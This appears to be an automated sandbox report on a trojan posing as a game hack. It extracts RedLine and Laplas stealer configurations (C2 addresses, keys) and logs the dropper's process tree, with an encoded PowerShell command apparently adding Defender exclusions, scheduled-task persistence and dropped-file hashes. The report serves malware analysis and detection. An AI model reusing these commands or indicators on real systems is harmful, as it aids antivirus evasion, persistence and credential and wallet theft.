Analysis

  • max time kernel
    134s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-07-2023 07:45

General

  • Target

    Moon Hack.exe

  • Size

    1.3MB

  • MD5

    b86d575cfbadc3aa88339316d0ede439

  • SHA1

    7aa793a0998635397aab3df0f9b3e767c31364f8

  • SHA256

    3b50875fcaf6c7b025b28174263cf78534749de54982fc52b296010ce838a7a2

  • SHA512

    1b4a4ec20d0954f0f2d4d98de8b051e6ee7da315648d5e45ab2f24690dc3d97ec7543d8afb53c3df3833490e23023724caf66eec909b55e84747d89268c96927

  • SSDEEP

    24576:0UW4INa580xo0GWFG4jQ1llLNhDaQV8VY8Rt3Z9ws:0Uz9O0xrGWFpQ1jLNhDaQWVY8Rt3Z9h

Malware Config

Extracted

Family

redline

Botnet

@dsfawderwe4128776rafsafsa

C2

94.142.138.4:80

Attributes
  • auth_value

    0b59c02d0b9ebe415e380c8824e6b419

Extracted

Family

laplas

C2

http://185.209.161.189

Attributes
  • api_key

    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Moon Hack.exe
    "C:\Users\Admin\AppData\Local\Temp\Moon Hack.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3372
      • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        3⤵
        • Executes dropped EXE
        PID:3568
    • C:\Users\Admin\AppData\Local\Temp\conhost.exe
      "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\system32\mode.com
          mode 65,10
          4⤵
            PID:3352
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p3723400966431979727828169 -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2516
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3240
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_4.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2040
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:492
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:4312
          • C:\Windows\system32\attrib.exe
            attrib +H "Installer.exe"
            4⤵
            • Views/modifies file attributes
            PID:3684
          • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
            "Installer.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3928
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C powershell -EncodedCommand "PAAjAEsAeABxAHkAcAA1AGYAdgBoADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAGMAeAA5AHUAOQBpAEMAWgBPAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOABlAEQAQgBDADAASgBjADMAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGYAMQBhAG0ATwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3628
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAEsAeABxAHkAcAA1AGYAdgBoADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAGMAeAA5AHUAOQBpAEMAWgBPAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOABlAEQAQgBDADAASgBjADMAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGYAMQBhAG0ATwB2ACMAPgA="
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3712
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6534" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
                PID:4796
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                5⤵
                  PID:1328

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eg4ho35v.1nr.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0aff3062636c07e673c614e4210a7c7e

          SHA1

          bb9266faa98ecc5e3772e9599e4fcf2008a2adcd

          SHA256

          28725b63a75a38a88b1663d49d4ba43ab917ba0d0ce6b700c64be2fefd8ffa8f

          SHA512

          07eaf2b78d959ff6d792d9ff5b5e2783b23a1bd65c59e77094ff3e70f1c902e6bac9c890246989bb9b7b2eeed87076bee54289ef46ece9f8278652690628986e

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0aff3062636c07e673c614e4210a7c7e

          SHA1

          bb9266faa98ecc5e3772e9599e4fcf2008a2adcd

          SHA256

          28725b63a75a38a88b1663d49d4ba43ab917ba0d0ce6b700c64be2fefd8ffa8f

          SHA512

          07eaf2b78d959ff6d792d9ff5b5e2783b23a1bd65c59e77094ff3e70f1c902e6bac9c890246989bb9b7b2eeed87076bee54289ef46ece9f8278652690628986e

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0aff3062636c07e673c614e4210a7c7e

          SHA1

          bb9266faa98ecc5e3772e9599e4fcf2008a2adcd

          SHA256

          28725b63a75a38a88b1663d49d4ba43ab917ba0d0ce6b700c64be2fefd8ffa8f

          SHA512

          07eaf2b78d959ff6d792d9ff5b5e2783b23a1bd65c59e77094ff3e70f1c902e6bac9c890246989bb9b7b2eeed87076bee54289ef46ece9f8278652690628986e

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

          Filesize

          21KB

          MD5

          7aa6a5a626cfa1260178d7bf1bd1dddb

          SHA1

          a7223bb6ba6efad042057120065c49eefb8fc8ea

          SHA256

          0179052465b4f304c3a946cd8c2022192ec672a1cb47bf1fe0bd6039cf77e83c

          SHA512

          2d52d43dd563d02dbfb6607ee2b9e058d11e7af2980eae88c9acf5de4adf4e41bf462841918e509cfad4055bc1cc8535fd3dd1143dec9ba9704134291aa170aa

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

          Filesize

          2.1MB

          MD5

          cfd06a23cdd0cad9964baef2d48709c3

          SHA1

          4fa67da62f36bc24e7655e1a13dd0e41e172586b

          SHA256

          dee2b650d898b91c6ef33f0170af1e3943c47b1a150962a9201b2575f8971acd

          SHA512

          be35d8fdb419153ae63671d67a6beb85e7e4b292c387ffa5ca3d16960c8bdaa6c482135dcc840f4693683a9475c1243dd262294f6ebf58290f6d4d3f13380546

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

          Filesize

          21KB

          MD5

          7aa6a5a626cfa1260178d7bf1bd1dddb

          SHA1

          a7223bb6ba6efad042057120065c49eefb8fc8ea

          SHA256

          0179052465b4f304c3a946cd8c2022192ec672a1cb47bf1fe0bd6039cf77e83c

          SHA512

          2d52d43dd563d02dbfb6607ee2b9e058d11e7af2980eae88c9acf5de4adf4e41bf462841918e509cfad4055bc1cc8535fd3dd1143dec9ba9704134291aa170aa

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

          Filesize

          9KB

          MD5

          8bad123f5cf71fc89af4dcd0b7e0dc3a

          SHA1

          5769ca42cf63173aa1c0bc681f459d1072327390

          SHA256

          c55f35297c28db3ca4b6d4d32902fdfe0567ce1c2e47877b07ceca79772153d9

          SHA512

          de6f00d1f7bab9db779d4b7e07ba4ca7156def2b36861d5e0485037d6ad7b136920bd263c2e293b5acd85bcc6c8cd021db310944aac0758fe065bf0856b8e22a

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

          Filesize

          9KB

          MD5

          ac80078a2f3e04e44399d76f04ea0d9f

          SHA1

          efd7b3c6cc78cbc023a55c9a3bfb7857183ffca4

          SHA256

          cbb94cd884f6bac87ba0379ef1f53b994736614ccd8c01d57403fb515fb70219

          SHA512

          37c55dde344b570fc3c0b661461625ca619a3a16081c30ccc1e51257be3823cbb541aa23df4e949456b5bfb5392da1437333719b0471dd03d4cc07d995bde72f

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

          Filesize

          9KB

          MD5

          7df98a3b1c1e55f5568bb3bf91fc0f9a

          SHA1

          7dd14a2c8a725178b2559a4b7c5d9373db5fa58b

          SHA256

          4c3b0cc50af879e4e77a3ff5a5cefc66bcb96c4d3f4a4c61ffa7a5f4c5f1f864

          SHA512

          6542aeeea8ee96bdc13b7b055196c54deff8f665ff73d4349a374e68e3e128aeaadaea16285bf3a2898b994250fa9fd5fa1e4db87a4d0203ce06ed2e49c947e4

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

          Filesize

          9KB

          MD5

          7703f67bf5a848f11f611f2adc8a9b9d

          SHA1

          36dad4be75e2cabab5dd5f12557c9677f17687ab

          SHA256

          da71fd4d58da91ce7d3ae21ca2c9887d95c9b414f4cdd8ba99ab8d04340e9139

          SHA512

          9a9eeab6a612ad9a51f631f16df9a9134f5b3a1ad3bad1005f79e2c972ecdcd166b8faae429fddc9c787603352ef380291e6b2add4a9e65108c9062dc245839f

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

          Filesize

          1.5MB

          MD5

          b43a823d7de0d2b913cba1aa08932eb6

          SHA1

          94b5f3aa5f8cbf976c3a87c9748bdc1133780f50

          SHA256

          b7ee030ccada50a20f87da01573fb9d0cff405fe9f5eab85df66acd020bc29af

          SHA512

          f45f20e7cccb752f5b4545f2e4f8418a173707e1131b2d4a8775d4dfef957b9f3319289dfd04f6c7ac0f7be09de6565c1d04ee570b275926f5f02822948ea431

        • C:\Users\Admin\AppData\Local\Temp\main\file.bin

          Filesize

          1.5MB

          MD5

          164ffbb4ce7fe04803078a77496f8aeb

          SHA1

          4716b5e07012785ed9f021c8f556c69e5924f4b4

          SHA256

          32f533b3aa6bd4d96996ba38ca84aeba408a758247c3ab55919a7f2a46ea8326

          SHA512

          1f28144563188300fe45c676581e43c43dc2aaaf9e46369bf3fc3825179fbeee47668cdd4c4e5ee63758bd81a455b9f2e2f53305fb4993551317ec40df87a14b

        • C:\Users\Admin\AppData\Local\Temp\main\main.bat

          Filesize

          471B

          MD5

          3b580d215631fc66c021c462c5d67341

          SHA1

          4f19ac12e1430b38954c6c9b5500f1dc6375259f

          SHA256

          dbf6cb5907b1210156b9ec4ce3c1ac9d687c5128b11ae90cdf23ef6c33d7b164

          SHA512

          e9eabb070774411fba16624844ee726f577829fca197a9afee2b96e2519dcbe5dde55388dffaba0d3bcb421e99ed33a63451a4cc385d64db4bac3c68be731e81

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          4.0MB

          MD5

          d076c4b5f5c42b44d583c534f78adbe7

          SHA1

          c35478e67d490145520be73277cd72cd4e837090

          SHA256

          2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8

          SHA512

          b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          4.0MB

          MD5

          d076c4b5f5c42b44d583c534f78adbe7

          SHA1

          c35478e67d490145520be73277cd72cd4e837090

          SHA256

          2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8

          SHA512

          b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          4.0MB

          MD5

          d076c4b5f5c42b44d583c534f78adbe7

          SHA1

          c35478e67d490145520be73277cd72cd4e837090

          SHA256

          2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8

          SHA512

          b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

        • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

          Filesize

          762.0MB

          MD5

          93a15a6020ab44015a84152ef3156103

          SHA1

          6e23b599dc553eb3e51d4f2fe3ea41ec38ee1e94

          SHA256

          5905256b076568489b58bcc06a76058433967650d2a51ca2cf6d9162337c10fb

          SHA512

          e02e9e1fa163ca2744bfb87db0e559663cc7c52904d8ca319aa84ae28176cd562af60566a6090656373231efed1b909dc137c0090df7d1bd3eae7d2dfc308dbf

        • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

          Filesize

          762.0MB

          MD5

          93a15a6020ab44015a84152ef3156103

          SHA1

          6e23b599dc553eb3e51d4f2fe3ea41ec38ee1e94

          SHA256

          5905256b076568489b58bcc06a76058433967650d2a51ca2cf6d9162337c10fb

          SHA512

          e02e9e1fa163ca2744bfb87db0e559663cc7c52904d8ca319aa84ae28176cd562af60566a6090656373231efed1b909dc137c0090df7d1bd3eae7d2dfc308dbf

        • memory/1084-146-0x0000000006D10000-0x0000000006DA2000-memory.dmp

          Filesize

          584KB

        • memory/1084-144-0x0000000000400000-0x0000000000555000-memory.dmp

          Filesize

          1.3MB

        • memory/1084-151-0x0000000009F60000-0x000000000A48C000-memory.dmp

          Filesize

          5.2MB

        • memory/1084-150-0x0000000009D80000-0x0000000009F42000-memory.dmp

          Filesize

          1.8MB

        • memory/1084-149-0x00000000097B0000-0x0000000009D54000-memory.dmp

          Filesize

          5.6MB

        • memory/1084-148-0x0000000009740000-0x00000000097A6000-memory.dmp

          Filesize

          408KB

        • memory/1084-147-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-191-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-145-0x0000000006120000-0x0000000006196000-memory.dmp

          Filesize

          472KB

        • memory/1084-152-0x0000000004D10000-0x0000000004D20000-memory.dmp

          Filesize

          64KB

        • memory/1084-143-0x00000000062E0000-0x000000000631C000-memory.dmp

          Filesize

          240KB

        • memory/1084-142-0x00000000061E0000-0x00000000061F2000-memory.dmp

          Filesize

          72KB

        • memory/1084-141-0x0000000005BD0000-0x0000000005CDA000-memory.dmp

          Filesize

          1.0MB

        • memory/1084-140-0x00000000053F0000-0x0000000005A08000-memory.dmp

          Filesize

          6.1MB

        • memory/1084-153-0x0000000007F20000-0x0000000007F70000-memory.dmp

          Filesize

          320KB

        • memory/1084-133-0x0000000000800000-0x0000000000830000-memory.dmp

          Filesize

          192KB

        • memory/1084-139-0x0000000004D10000-0x0000000004D20000-memory.dmp

          Filesize

          64KB

        • memory/1084-138-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-134-0x0000000000400000-0x0000000000555000-memory.dmp

          Filesize

          1.3MB

        • memory/3712-237-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3712-259-0x0000000071720000-0x000000007176C000-memory.dmp

          Filesize

          304KB

        • memory/3712-286-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3712-238-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-239-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-240-0x0000000005D10000-0x0000000006338000-memory.dmp

          Filesize

          6.2MB

        • memory/3712-241-0x0000000005920000-0x0000000005942000-memory.dmp

          Filesize

          136KB

        • memory/3712-247-0x0000000005C10000-0x0000000005C76000-memory.dmp

          Filesize

          408KB

        • memory/3712-283-0x0000000007EA0000-0x0000000007EA8000-memory.dmp

          Filesize

          32KB

        • memory/3712-252-0x0000000006910000-0x000000000692E000-memory.dmp

          Filesize

          120KB

        • memory/3712-253-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-257-0x000000007EE20000-0x000000007EE30000-memory.dmp

          Filesize

          64KB

        • memory/3712-258-0x00000000078C0000-0x00000000078F2000-memory.dmp

          Filesize

          200KB

        • memory/3712-236-0x0000000001820000-0x0000000001856000-memory.dmp

          Filesize

          216KB

        • memory/3712-269-0x0000000006EE0000-0x0000000006EFE000-memory.dmp

          Filesize

          120KB

        • memory/3712-270-0x0000000008260000-0x00000000088DA000-memory.dmp

          Filesize

          6.5MB

        • memory/3712-271-0x0000000007C20000-0x0000000007C3A000-memory.dmp

          Filesize

          104KB

        • memory/3712-274-0x0000000007C90000-0x0000000007C9A000-memory.dmp

          Filesize

          40KB

        • memory/3712-282-0x0000000007F50000-0x0000000007F6A000-memory.dmp

          Filesize

          104KB

        • memory/3712-276-0x0000000007EB0000-0x0000000007F46000-memory.dmp

          Filesize

          600KB

        • memory/3712-281-0x0000000007E60000-0x0000000007E6E000-memory.dmp

          Filesize

          56KB

        • memory/3928-280-0x0000000005650000-0x0000000005660000-memory.dmp

          Filesize

          64KB

        • memory/3928-275-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3928-233-0x0000000005650000-0x0000000005660000-memory.dmp

          Filesize

          64KB

        • memory/3928-234-0x00000000054E0000-0x00000000054EA000-memory.dmp

          Filesize

          40KB

        • memory/3928-232-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3928-231-0x0000000000A80000-0x0000000000A8C000-memory.dmp

          Filesize

          48KB

        • memory/3928-291-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB